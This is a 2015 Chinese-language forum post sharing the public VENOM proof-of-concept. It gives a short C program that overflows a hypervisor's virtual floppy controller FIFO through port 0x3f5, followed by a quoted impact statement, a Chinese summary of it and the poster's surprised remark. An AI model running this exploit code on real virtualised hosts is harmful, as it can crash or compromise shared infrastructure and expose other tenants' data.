作者k101122 (肯特)
看板PCCU-CS
标题[废文] 毒液漏洞POC
时间Fri May 22 11:23:49 2015
#include <sys/io.h>
#define FIFO 0x3f5
int main() {
int i;
iopl(3);
outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
Exploitation of the VENOM vulnerability can expose access to corporate intellectual
property(IP), in addition to sensitive and personally identifiable information(PII),
potentially impacting the thousands of organizations and millions of end users that
rely on affected VMs for the allocation of shared computing resources , as well as
connectivity, storage, security, and privacy.
大意:
透过VENOM漏洞,可以偷到公司知产、敏感讯息、个资等等
除此之外,还可能影想多达千万相关机构的。这些机构的VM的
资源、连接资讯、储存资讯、安全性及隐私都会被影响。
心得:
开头附上的POC...吓到! 就这样= =||||
--
※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 211.22.20.13
※ 文章网址: https://webptt.com/cn.aspx?n=bbs/PCCU-CS/M.1432265034.A.46F.html